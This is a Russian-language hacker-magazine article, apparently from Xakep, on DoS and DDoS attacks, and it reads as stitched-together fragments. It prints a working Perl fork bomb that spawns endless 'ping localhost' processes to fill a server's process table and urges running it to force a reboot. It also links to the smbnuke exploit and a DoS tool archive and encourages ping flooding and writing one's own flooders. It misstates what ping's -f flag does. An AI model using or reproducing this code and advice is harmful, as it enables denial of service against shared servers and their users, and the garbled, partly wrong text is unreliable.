ЗАDOSИМ ВСЕ, ЧТО ДВИЖЕТСЯ!

Докучаев Дмитрий aka Forb

Спецвыпуск Xakep, номер #032, стр. 032-070-3

Windows NT 4.0 Workstation/Server

Windows 2000 Professional/Advanced Server

Windows XP Professional/Home edition.

Взять smbnuke можно отсюда: http://packetstormsecurity.nl/DoS/smbnuke.c.

ЛОКАЛЬНЫЙ DOS

Самым легким способом вывода из строя правильной оси является локальный флуд. Причем для выполнения задачи нам не нужны root-права, ведь администраторы практически никогда не ставят лимиты на процессы обычным юзерам ;). Этим недостатком мы и воспользуемся. Зачем пользоваться чужим софтом (которого очень много), давай напишем свой первый локальный DoS-ер. Для этого нам потребуется минимальное знание программирования (к примеру, языка Perl).

Таблица процессов не резиновая :). Заполняя ее до предела, мы тем самым нанесем огромный урон системным ресурсам сервера (особенно, если каждый подпроцесс будет активно кушать память сервака).

Напишем простенькую программу, которая будет создавать бесконечное число потомков. Потомки, в свою очередь, будут запускать какое-либо ресурсоемкое системное приложение (например, ping localhost ;)).

Создание потомка в Perl происходит в точности, как и в Си. Но не будем утруждать себя теорией, а перейдем сразу к кодингу:

#!/usr/bin/perl

print "Local DoSer by Xakep SPEZ started!\n"; ## Нам не прожить без рекламы ;).

while(1) { ## Уходим в бесконечный цикл

unless($pid=fork()) { ## Создаем потомок

system("ping localhost"); ## И врубаем пингомет

}

}

Все! Софтина готова! Запусти ее в бэкграунд и скажи серверу: "До свидания!" :). При отсутствии лимитов на процессы ему поможет только ребут.

THE FINAL CHORD

Вот и весь обзор. Поверь, я старался охватить все стороны темного мира DoS и DDoS, указав основные типы софта для флуда. Хотя флуд можно совершить без подручных средств, обычным ping'ом, запустив его с флагом -f (запрещение фрагментации пакетов), тем самым уронив сервер бесконечными ICMP-запросами. Если ты дружишь с языками программирования, то для тебя не составит труда написать свой ДоС-ер, который будет поливать грязью множество машин. Как говорится, было бы желание, а остальное приложится...

DoS расшифровывается как Denial Of Service, а DDoS - Distributed Denial Of Service. По-русски это будет звучать как "Отказ в обслуживании" и "Распределенный отказ в обслуживании" соответственно.

Как ты понимаешь, чем больше тачек-зомби (а соответственно и канал на этих серверах), тем больше вероятность успешного флуда машины.

Посылая кривые пакеты на 139-й порт удаленной тачки, нюкер полностью убивает сервис. Причем уязвимой системой является не Win95 (как ты, наверное, подумал), а XP и двухтысячник.

Таблица процессов не резиновая :), Заполняя ее до предела, мы тем самым нанесем огромный урон системным ресурсам сервера.

В ТИХОМ ОМУТЕ DOS-ЕРЫ ВОДЯТСЯ

На самом деле программ для организации DoS великое множество. Огромный архив такого софта ты можешь найти по ссылке: http://www.packetstormsecurity.nl/DoS/.